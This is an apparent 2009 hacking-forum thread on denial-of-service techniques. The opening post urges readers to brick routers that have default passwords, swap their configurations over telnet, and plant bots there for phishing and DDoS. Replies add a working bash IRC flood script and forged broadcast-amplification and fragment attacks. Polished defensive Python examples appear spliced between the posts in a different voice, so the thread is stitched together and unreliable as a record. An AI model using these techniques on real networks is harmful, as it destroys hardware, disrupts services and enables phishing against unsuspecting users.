*lol wut?*


The Cheshire Cat
06-29-2009, 11:08 PM
#disclaimer - The information covered in this paper is for learning purposes only. The author holds no responsibility for the actions taken by individuals by the information disclosed within. The author is not liable for any damages caused by any individual using this information for malicious intent and or conspiracy to cause malicious intent. This is also not a 'step by step' paper. For the skript kiddies looking for easy answers, GO SOMEWHERE ELSE!

#intro - In this paper we are going to look at some of the more uncommon or rarely heard of methods of Denial of Service. It's a well known fact that BotNets are used for Denial of Service attacks. It's a little known fact that you can do just as much damage without the hassle of having to go through the drawn out process of building a BotNet. I'm going to address a few methods, how they work, what they do, and how you yourself can use these techniques. Prepare to enter the world of easy DoS.

#definitions and pre-req. - A Denial of Service attack, also known as a DoS or DDoS, is an attempt to make a computer resource or network unavailable to legitimate intended users. A Denial of Service generally consists of efforts of a person or a group of people to prevent a website or service from functioning correctly. A very common Denial of Service attack, which we are going to cover the methods of, involves saturating the target machine with external communication requests so that it cannot respond to legitimate traffic. There are many other types of attacks for a denial of service. We are mainly concerned with only a few of them in this article.

As a pre-req for this paper, and for you to completely understand this, you need knowledge of the TCP/IP protocol and basic networking knowledge, server functions and request handling, basic packet structure theory and packet crafting, and fluid use of CLI and terminal functions.

#phlashing//bricking - This is something relatively new, and not widely used, but it can be the most malicious of all the DoS types. Phlashing is considered a Permanent Denial of Service attack because it causes damage to the network on a hardware level, instead of a software level or by using up resources. In theory, phlashing is considered one of the easier levels of causing a Denial of Service but the most improbable to perform remotely. The Permanent Denial of Service relies on flaws in remote management interfaces of routers, printers and other networking/networked devices. Other flaws consist of default passwords, or easily bruteforced or 'guessable' passwords on root or administrator accounts for that device. These flaws leave the door open for an attacker to remotely update the device with a modified, corrupt or defective firmware image. The updating of this router with faulty firmware 'bricks' the device, rendering it useless and unable to serve the network in which it is placed.

Considering this hardware attack can be much faster and requires less time than building a BotNet and is, for the most part, easily carried out, it is one of the most dangerous. Considering that, let us look at an attack in real time.

Now, considering the amount of IPs that are assigned to countries like the US, China, Japan and the UK, we are going to be scanning in a less populated country for misconfigured routers and the like. To make this a little more simple, we are going to look for web-based configuration pages. You may also be able to configure routers via telnet on port 23, but we can save that for later in the paper.

Let us take a look at a real life PoC.

http://i70.photobucket.com/albums/i91/O__RLY/bricked1.jpg

There are loads of these around, you just have to know where to look

http://i70.photobucket.com/albums/i91/O__RLY/bricked2.jpg

Updating the firmware/software of the router

You can open up notepad and type gibberish, or you can do whatever. Just so long as you have the correct extension.

http://i70.photobucket.com/albums/i91/O__RLY/bricked4.jpg

END_OF Bricking

#RouteNet

As we move on, I'm going to get into a little bit of CLI and routers. The most known way to configure routers is web based. You enter in your local gateway, get a login prompt and then you get a GUI to work with. What most people don't know is that routers also have a Command Line Interface that gives you way more functionality than the GUI.

http://i70.photobucket.com/albums/i91/O__RLY/bricked5.jpg

http://i70.photobucket.com/albums/i91/O__RLY/bricked6.jpg

I use PuTTY to telnet into the router, just because it's clean and it's not shitty like the command prompt.

http://i70.photobucket.com/albums/i91/O__RLY/bricked7.jpg

As you can see, I've dumped the configuration file. It's displayed as plain text on the screen. This is most likely 'default'. The nice thing about this is, we can copy it over locally and edit the file to whatever we choose and we can upload it and replace it.

http://i70.photobucket.com/albums/i91/O__RLY/bricked8.jpg

Now, every router is different because of vendor/model/version. Nothing is going to be universal. I'm not going to get into how to code up a bot, where to put the bot and how to use a bot because it's too much work for me, and how are you ever going to learn if you're taught EVERYTHING. The nice thing about having a bot on a router, depending on functionality, is that you now have a backdoor, and complete control over EVERYTHING. You can use this to point to a phisher for paypal/banks/credit cards or damn near anything. You can also use them for DDoS'es. This works out 10x better than computers because they do not make an AV for routers; also, routers are on 99% of the time, unlike computers, which are shut down when you're done using them or go into hibernation.


Proof this isn't a one off.

http://i70.photobucket.com/albums/i91/O__RLY/bricked9.jpg

http://i70.photobucket.com/albums/i91/O__RLY/bricked10.jpg

Now, this isn't the only thing you can do while you have control over the router through the CLI. The possibilities are endless and you should let your imagination run wild.

#END_OF RouteNet

Seeing as I'm out of time right now, I'll update this thread with more information on techniques. If anyone else would like to add anything, clear up anything that is wrong with it, or just wants to ask questions, you are more than welcome to. In fact, I urge you to help contribute to this. This is just to help educate people on various well known and used, and unknown and rarely used, forms of DoS. As we go on I will try to explain more about Distributed attacks, smurf attacks, reflected attacks and other such things.
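The bricking section above turns on one weak check: the management interface accepts any upload that has the right file extension. The following is an added example written for this thread, not code from the original post or from any router vendor, showing that extension-only gate beside the gate a device should apply before flashing: authenticate the image first, then check its structure. The image layout (magic header, length field), the `.bin` suffix and the vendor key are constructed for the example; a real device would verify an asymmetric signature against a public key fixed at manufacture rather than a shared HMAC key.

```python
import hashlib
import hmac

# Hypothetical image layout for this example: a fixed magic header, a 4-byte
# big-endian payload length, then the payload. Real vendors use their own
# formats; the checks below are the kind a device should run before flashing.
MAGIC = b"FWIMG\x01"
MIN_IMAGE_SIZE = 64

# Constructed key for the example only. A real device verifies an asymmetric
# signature against a public key fixed at manufacture; a shared secret like
# this one would be recoverable from the firmware itself.
VENDOR_KEY = b"example-vendor-key-not-real"


def build_image(payload: bytes) -> bytes:
    """Construct a well-formed sample image from a payload."""
    return MAGIC + len(payload).to_bytes(4, "big") + payload


def sign_image(image: bytes, key: bytes = VENDOR_KEY) -> bytes:
    """Constructed stand-in for the vendor's signing step (HMAC-SHA256)."""
    return hmac.new(key, image, hashlib.sha256).digest()


def extension_only_check(filename: str) -> bool:
    """The weak gate the post describes: anything with the right suffix passes."""
    return filename.lower().endswith(".bin")


def validate_firmware(image: bytes, signature: bytes, key: bytes = VENDOR_KEY):
    """Hardened gate: verify authenticity before parsing, then structure.

    Returns (accepted, reason). The signature is checked first so that no
    untrusted bytes are interpreted before their origin is established.
    """
    if not hmac.compare_digest(sign_image(image, key), signature):
        return False, "bad signature"
    if len(image) < MIN_IMAGE_SIZE:
        return False, "image too small"
    if not image.startswith(MAGIC):
        return False, "bad magic header"
    declared = int.from_bytes(image[len(MAGIC):len(MAGIC) + 4], "big")
    if declared != len(image) - len(MAGIC) - 4:
        return False, "length mismatch"
    return True, "ok"


if __name__ == "__main__":
    good = build_image(b"\x00" * 100)
    junk = b"oOo gibberish " * 8          # "notepad gibberish" saved with a .bin name
    print("extension check on junk:", extension_only_check("update.bin"))
    print("hardened check on junk:", validate_firmware(junk, b"\x00" * 32))
    print("hardened check on real image:", validate_firmware(good, sign_image(good)))
```

The ordering matters: the signature is compared before any field of the image is read, so a malformed upload is rejected without the device ever parsing it, and the structural checks afterwards only run on bytes the vendor actually produced. The same principle (authenticate, then parse) applies to the configuration-file upload shown later in the post.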

v0x
06-29-2009, 11:17 PM
I FUCKING LOVE YOU

No homo. But seriously, major congrats on perfecting this. I remember when you discovered it last year in IRC. This is going to usher in a new age of hacking :eek::cool:

The Cheshire Cat
06-29-2009, 11:23 PM
# IRC Join/Part Floods.

Another DoS attack (more so a degradation instead of denial) that is very popular is the IRC Join/Part flood. These are mostly used when private servers have it out for one another, or someone very bored wants to aggravate a channel/server. As most people think, this is all done with a BotNet. This isn't quite true. To have a very effective join/part flood, a BotNet would be ideal, but isn't needed to aggravate people. As of now, most IRC servers limit connections to a server to one or two connections per IP address. We can work around that by creating a program that uses a list of proxies via HTTP/SOCKS/Wingates to connect through per bot that is spawned locally. Seeing as each bot uses its own proxy, you are able to get around the 2 connections per IP rule.


#!/bin/bash

# A name for the script
NAME="[ooo]"

# common.sh is not shown in the post; the script expects it to define
# init, xsleep, the format codes B, R and U, and HOST and PORT.
source common.sh

ooo () {
    local period dest

    echo "Period (in seconds) ?" 1>&2
    read period

    echo "Destination ?" 1>&2
    read dest

    declare -a char
    char=(o o O)
    declare -a ctrl
    ctrl=($B $R $U ' #')
    size=512

    init
    while true
    do
        buffer=""
        i=0
        # build a roughly 512-character line of random o/O runs
        # separated by random format codes
        while [ $i -lt $size ]
        do
            s1=""
            n=$((RANDOM%5+1))
            j=0
            while [ $j -lt $n ]
            do
                s1=${s1}${char[((RANDOM%3))]}
                let j=j+1
            done
            s2=${ctrl[$((RANDOM%4))]}
            buffer=${buffer}${s1}${s2}
            let i=i+n+1
        done
        echo -e "privmsg $dest :$buffer"
        xsleep $period
    done
}

# arrays and $((...)) need bash 2 or later; stop here instead of running on
if [ ${BASH_VERSION%%.*} -lt 2 ]
then
    echo "This function is only available in bash 2.x"
    exit 1
fi

ooo | telnet $HOST $PORT



Of course, that's a bash script but there really isn't much to this. As long as you have a good amount of programming skills, you can pull it off fairly easily. There really isn't much more to explain. This is fairly easy to understand but it's an idea that I have never really heard many people talk about.

END_OF IRC Join/part flood
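The post's point is that a per-IP connection cap is evaded by spreading the bots across proxies. From the server side the signal that survives that evasion is the event rate on the channel itself, which is why ircds throttle joins per channel rather than only per source. The following is an added example for this thread, not code from the post or from any IRC daemon: a sliding-window JOIN/PART counter keyed by channel, run over a constructed log in which fifteen single-use proxy hosts each contribute only two events (under any per-IP limit) yet trip the channel-level threshold. The log line format and the `#target`/`#other` channels are constructed for the example.

```python
from collections import deque


class ChannelFloodDetector:
    """Sliding-window JOIN/PART counter keyed by channel, not by source host.

    A flood spread across many proxies stays under any per-IP connection cap,
    but it still lands on one channel, so the channel-level event rate is the
    signal that survives the evasion.
    """

    def __init__(self, max_events: int, window_seconds: float):
        self.max_events = max_events
        self.window = window_seconds
        self._events = {}  # channel -> deque of timestamps inside the window

    def observe(self, ts: float, channel: str) -> bool:
        """Record one JOIN/PART at time ts; True if the channel is now flooding."""
        q = self._events.setdefault(channel, deque())
        q.append(ts)
        while q and ts - q[0] > self.window:
            q.popleft()
        return len(q) > self.max_events


def parse_event(line: str):
    """Parse one line of the constructed log:
    '<ts> <nick>!<user>@<host> <JOIN|PART> <channel>'."""
    ts, prefix, verb, channel = line.split()
    if verb not in ("JOIN", "PART"):
        return None
    host = prefix.split("@", 1)[1]
    return float(ts), host, verb, channel


def analyze(lines, max_events=10, window=5.0):
    """Per-channel stats: first flood timestamp (or None), distinct hosts,
    total events, and the most events any single host produced."""
    det = ChannelFloodDetector(max_events, window)
    stats = {}
    events = [e for e in (parse_event(ln) for ln in lines) if e]
    for ts, host, _verb, channel in sorted(events):
        s = stats.setdefault(channel, {"first_flood_ts": None, "events": 0,
                                       "hosts": set(), "per_host": {}})
        s["events"] += 1
        s["hosts"].add(host)
        s["per_host"][host] = s["per_host"].get(host, 0) + 1
        if det.observe(ts, channel) and s["first_flood_ts"] is None:
            s["first_flood_ts"] = ts
    for s in stats.values():
        s["distinct_hosts"] = len(s.pop("hosts"))
        s["max_per_host"] = max(s.pop("per_host").values())
    return stats


def constructed_sample_log():
    """Constructed traffic: 15 single-use proxy hosts each JOIN then PART
    #target within about 1.5 s, plus three ordinary joins to #other."""
    lines = []
    for i in range(15):
        prefix = f"bot{i}!u@proxy{i}.example"
        lines.append(f"{10 + 0.1 * i:.2f} {prefix} JOIN #target")
        lines.append(f"{10.05 + 0.1 * i:.2f} {prefix} PART #target")
    for i, nick in enumerate(("alice", "bob", "carol")):
        lines.append(f"{12 + i:.2f} {nick}!u@home{i}.example JOIN #other")
    return lines


if __name__ == "__main__":
    for chan, s in analyze(constructed_sample_log()).items():
        print(chan, s)
```

With a window of 5 seconds and a ceiling of 10 events, the eleventh JOIN/PART on `#target` trips the detector half a second into the burst, while no single host ever exceeded two events; `#other`, with three joins over three seconds, is never flagged. A server acting on this signal would temporarily restrict joins to the channel (the usual response) rather than ban the hosts, since the hosts are disposable.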

-SpectraL
06-30-2009, 12:29 AM
Also fun is the ZenMap/NMAP tool, providing all sorts of goodies and other assorted niceties for the interested interloper:

http://i481.photobucket.com/albums/rr172/SpectraLPics/a.jpg

http://i481.photobucket.com/albums/rr172/SpectraLPics/b.jpg

http://i481.photobucket.com/albums/rr172/SpectraLPics/c.jpg

Dfg
06-30-2009, 12:33 AM
Thanks for the info.

eSparq
06-30-2009, 01:08 AM
OK, I spoke with Exploitz in IRC about this thread, and I figured I could add a little bit to it. There are a couple techniques we discussed which might be useful in creating a little disruption.

The first we discussed (and he's still attempting) is to take advantage of a subnet's broadcast address. By sending packets to a network's broadcast address, assuming they're following the protocol, you send a copy of those packets to every machine on the subnet -- multiplying your attacking power. But that's not the end of it. Let's say we have subnet 1 and subnet 2, and we want to DoS subnet 1. Let's assume subnet 2 is at least as large as subnet 1. So we send a packet to subnet 2's broadcast address, and we forge the packet's header to say the packet is from subnet 1's broadcast address. Now, each machine in subnet 2 will respond with either a SYN/ACK or a RST packet to subnet 1's broadcast address. Now, each machine in subnet 1 will respond with either SYN/ACK or RST packets to each machine in subnet 2.


Exploitz came up with this idea: Let's take that just one step farther. Let's forge a packet to have both the source and destination addresses be the broadcast address for some subnet. Now, it'll forward those packets to each machine, which will reply to the broadcast address for their own subnet, which will distribute the replies to all the machines, which will reply to each of the other machines.

Yes, it gets messy, but all that text just means that a lot of traffic is being sent based on just one packet. Imagine running thousands of packets through that mess.

Of course, to defend against this, simply disallow broadcasting in your network stack, or firewall the broadcast addresses.


The remaining technique we discussed is something I've mentioned before. Let's forge a packet directed to the machine, with the flags set to SYN/FRAG/MOREFRAGS (that is, start of communication and fragmented, with more fragments to follow). We set the fragment offset to zero so that the first fragment is sent, but never any others.

The result of this technique is three forms of DoS in one: First, you take up bandwidth, as you are presumably sending fragments like this in quick succession. Second, you take memory space, as each of those fragmented packets has to be stored in memory until either the packet times out or is fully reassembled (which will never happen). Third, you take up CPU time, as the machine is trying to figure out how to reassemble the packets you're feeding it. Such a target should come to a screeching halt unless it has patches to prevent this attack from working.


If I can think of any more I'll post again later.
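Both techniques in the post above have a well-defined fingerprint on the wire, and the defence named in it (do not forward directed broadcasts, firewall the broadcast addresses; a reassembly timeout for the fragment case) is what a network stack or sensor implements. The following is an added example for this thread, not code from the post or from any IDS: it runs two checks over a constructed packet capture. The first flags TCP SYNs aimed at a monitored subnet's directed-broadcast address and any packet whose *source* is a broadcast address, which no real host emits and which is therefore a forged header by definition. The second performs the bookkeeping a fragment-reassembly timeout does, listing (src, dst, IP ID) keys whose first fragment (offset 0, MF set) was never followed by a final fragment. The `Packet` record, the RFC 5737 documentation addresses and the sample packets are constructed for the example.

```python
import ipaddress
from dataclasses import dataclass


@dataclass(frozen=True)
class Packet:
    """Minimal view of an IP packet as a sensor might record it (constructed)."""
    ts: float
    src: str
    dst: str
    ip_id: int
    frag_offset: int      # in 8-byte units, as carried in the IP header
    more_fragments: bool  # the MF flag
    tcp_syn: bool         # SYN set in the (first fragment's) TCP header


def broadcast_addresses(subnets):
    """Directed-broadcast addresses of the subnets a sensor is responsible for."""
    return {str(ipaddress.ip_network(s).broadcast_address) for s in subnets}


def find_broadcast_abuse(packets, subnets):
    """Flag the amplification pattern from the post: SYNs aimed at a directed
    broadcast, and packets whose source is itself a broadcast address."""
    bcast = broadcast_addresses(subnets)
    findings = []
    for p in packets:
        reasons = []
        if p.src in bcast:
            reasons.append("spoofed broadcast source")
        if p.dst in bcast and p.tcp_syn:
            reasons.append("TCP SYN to directed broadcast")
        if reasons:
            findings.append((p.ts, reasons))
    return findings


def find_stalled_fragments(packets, timeout, now):
    """Reassembly keys (src, dst, ip_id) whose first fragment (offset 0, MF set)
    was seen but no final fragment (MF clear, offset > 0) arrived within
    `timeout` seconds. A stack that keeps such buffers without a timeout is
    the memory-exhaustion target the post describes."""
    first_seen = {}
    completed = set()
    for p in packets:
        key = (p.src, p.dst, p.ip_id)
        if p.more_fragments and p.frag_offset == 0:
            first_seen.setdefault(key, p.ts)
        elif not p.more_fragments and p.frag_offset > 0:
            completed.add(key)
    return sorted(k for k, t in first_seen.items()
                  if k not in completed and now - t > timeout)


# Constructed sample capture using documentation address ranges (RFC 5737).
MONITORED_SUBNETS = ["192.0.2.0/24", "198.51.100.0/24"]
SAMPLE = [
    Packet(1.0, "203.0.113.7", "198.51.100.255", 1, 0, False, True),    # SYN to broadcast
    Packet(2.0, "192.0.2.255", "198.51.100.255", 2, 0, False, True),    # broadcast-to-broadcast forgery
    Packet(3.0, "203.0.113.7", "192.0.2.10", 3, 0, False, True),        # ordinary SYN
    Packet(4.0, "203.0.113.9", "192.0.2.10", 100, 0, True, True),       # first fragment, never completed
    Packet(4.1, "198.51.100.5", "192.0.2.10", 200, 0, True, False),     # first fragment of a real datagram
    Packet(4.2, "198.51.100.5", "192.0.2.10", 200, 3, False, False),    # its final fragment
]

if __name__ == "__main__":
    print(find_broadcast_abuse(SAMPLE, MONITORED_SUBNETS))
    print(find_stalled_fragments(SAMPLE, timeout=15.0, now=30.0))
```

On the sample capture the first check reports the SYN to 198.51.100.255 and the packet that claims 192.0.2.255 as its source, and the second reports only the fragment train with IP ID 100, since ID 200 was completed. The broadcast half of this is the detection counterpart of the fix the post already gives: a router that does not forward directed broadcasts (the behaviour RFC 2644 makes the default) never lets the first packet fan out, and a border filter that drops packets sourced from a broadcast address removes the forged reply path. The fragment half is exactly what a bounded reassembly queue with a timeout does for you; the check here only makes that state visible.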

zecklips
06-30-2009, 04:32 AM
grab net tools from download.com.. and use the udp flooders with this?... humm some other tools come with its package.... could be fun to explore with this.

enkrypt0r
06-30-2009, 06:35 AM
Wow, dude. Great post! For about two years now, I've been thinking on and off about this very thing, but I've never gone in-depth as much as you have. For a while now, I've been thinking of all the different ways that this is advantageous in comparison to regular DDoS, most of which you have listed. I really think that the next huge revolution in the field will be this very thing.

I really have a lot to say about this, but it's almost 2am, and I can't seem to get all of my thoughts organized. I'll try to post some of my thoughts later.

Thanks for bringing this up, I hadn't given it much thought in a while.

5024L
06-30-2009, 08:24 AM
Cool thread now voice me in IRC please.